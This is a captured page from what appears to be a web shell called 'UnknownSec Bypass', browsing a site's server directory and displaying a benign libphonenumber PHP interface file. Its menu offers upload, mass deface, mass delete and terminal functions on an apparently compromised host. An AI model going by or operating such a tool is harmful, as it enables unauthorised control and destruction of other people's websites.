UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
vendor
/
giggsey
/
libphonenumber-for-php
/
src
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
MetadataSourceInterface.php
<?php namespace libphonenumber; interface MetadataSourceInterface { /** * Gets phone metadata for a region. * @param string $regionCode the region code. * @return PhoneMetadata the phone metadata for that region, or null if there is none. */ public function getMetadataForRegion($regionCode); /** * Gets phone metadata for a non-geographical region. * @param int $countryCallingCode the country calling code. * @return PhoneMetadata the phone metadata for that region, or null if there is none. */ public function getMetadataForNonGeographicalRegion($countryCallingCode); }
Copyright © 2025 - UnknownSec